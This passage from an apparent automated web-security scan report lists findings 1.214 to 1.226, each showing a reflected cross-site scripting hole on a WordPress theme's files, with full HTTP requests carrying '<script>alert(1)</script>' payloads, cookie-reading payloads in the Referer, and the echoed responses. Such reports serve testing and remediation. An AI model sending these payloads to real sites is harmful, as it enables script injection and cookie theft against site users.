Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:23 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/cssd29c1\"><script>alert(1)</script>4cf7d2ba27e/typography.css" type="hidden" />
...[SNIP]...

1.214. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5819a"><script>alert(1)</script>9a753a5b1d was submitted in the REST URL parameter 5. This input was echoed as 5819a\"><script>alert(1)</script>9a753a5b1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css5819a"><script>alert(1)</script>9a753a5b1d HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:26 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:27 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44385

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css5819a\"><script>alert(1)</script>9a753a5b1d" type="hidden" />
...[SNIP]...

1.215. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/typography.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2afa"><script>alert(1)</script>b46c25ec446 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2afa\"><script>alert(1)</script>b46c25ec446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/typography.css?e2afa"><script>alert(1)</script>b46c25ec446=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:42 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css?e2afa\"><script>alert(1)</script>b46c25ec446=1" type="hidden" />
...[SNIP]...

1.216. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c34d1"><script>alert(1)</script>748b167765a was submitted in the REST URL parameter 1. This input was echoed as c34d1\"><script>alert(1)</script>748b167765a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentc34d1"><script>alert(1)</script>748b167765a/themes/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentc34d1\"><script>alert(1)</script>748b167765a/themes/rt_mynxx_wp/css/wp.css" type="hidden" />
...[SNIP]...

1.217. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf91"><script>alert(1)</script>626365865a6 was submitted in the REST URL parameter 2. This input was echoed as 8cf91\"><script>alert(1)</script>626365865a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes8cf91"><script>alert(1)</script>626365865a6/rt_mynxx_wp/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes8cf91\"><script>alert(1)</script>626365865a6/rt_mynxx_wp/css/wp.css" type="hidden" />
...[SNIP]...

1.218. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c13"><script>alert(1)</script>2d765b40d27 was submitted in the REST URL parameter 3. This input was echoed as e1c13\"><script>alert(1)</script>2d765b40d27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wpe1c13"><script>alert(1)</script>2d765b40d27/css/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:07 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:08 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wpe1c13\"><script>alert(1)</script>2d765b40d27/css/wp.css" type="hidden" />
...[SNIP]...

1.219. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82120"><script>alert(1)</script>9823ffbbc86 was submitted in the REST URL parameter 4. This input was echoed as 82120\"><script>alert(1)</script>9823ffbbc86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css82120"><script>alert(1)</script>9823ffbbc86/wp.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css82120\"><script>alert(1)</script>9823ffbbc86/wp.css" type="hidden" />
...[SNIP]...

1.220. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac4d1"><script>alert(1)</script>a686e148c2f was submitted in the REST URL parameter 5. This input was echoed as ac4d1\"><script>alert(1)</script>a686e148c2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.cssac4d1"><script>alert(1)</script>a686e148c2f HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:12 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.cssac4d1\"><script>alert(1)</script>a686e148c2f" type="hidden" />
...[SNIP]...

1.221. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/wp.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b124"><script>alert(1)</script>cdcdc3bd480 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b124\"><script>alert(1)</script>cdcdc3bd480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/css/wp.css?5b124"><script>alert(1)</script>cdcdc3bd480=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css?5b124\"><script>alert(1)</script>cdcdc3bd480=1" type="hidden" />
...[SNIP]...

1.222. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8df1"><script>alert(1)</script>df54dde89f2 was submitted in the REST URL parameter 1. This input was echoed as f8df1\"><script>alert(1)</script>df54dde89f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentf8df1"><script>alert(1)</script>df54dde89f2/themes/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentf8df1\"><script>alert(1)</script>df54dde89f2/themes/rt_mynxx_wp/js/mootools.bgiframe.js" type="hidden" />
...[SNIP]...

1.223. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63f41"><script>alert(1)</script>65897b2ba3e was submitted in the REST URL parameter 2. This input was echoed as 63f41\"><script>alert(1)</script>65897b2ba3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes63f41"><script>alert(1)</script>65897b2ba3e/rt_mynxx_wp/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:13 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes63f41\"><script>alert(1)</script>65897b2ba3e/rt_mynxx_wp/js/mootools.bgiframe.js" type="hidden" />
...[SNIP]...

1.224. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a58c"><script>alert(1)</script>ebe51364ac1 was submitted in the REST URL parameter 3. This input was echoed as 7a58c\"><script>alert(1)</script>ebe51364ac1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp7a58c"><script>alert(1)</script>ebe51364ac1/js/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:24 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp7a58c\"><script>alert(1)</script>ebe51364ac1/js/mootools.bgiframe.js" type="hidden" />
...[SNIP]...

1.225. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c76b4"><script>alert(1)</script>88ae0b76c7 was submitted in the REST URL parameter 4. This input was echoed as c76b4\"><script>alert(1)</script>88ae0b76c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/jsc76b4"><script>alert(1)</script>88ae0b76c7/mootools.bgiframe.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:36 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/jsc76b4\"><script>alert(1)</script>88ae0b76c7/mootools.bgiframe.js" type="hidden" />
...[SNIP]...

1.226. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
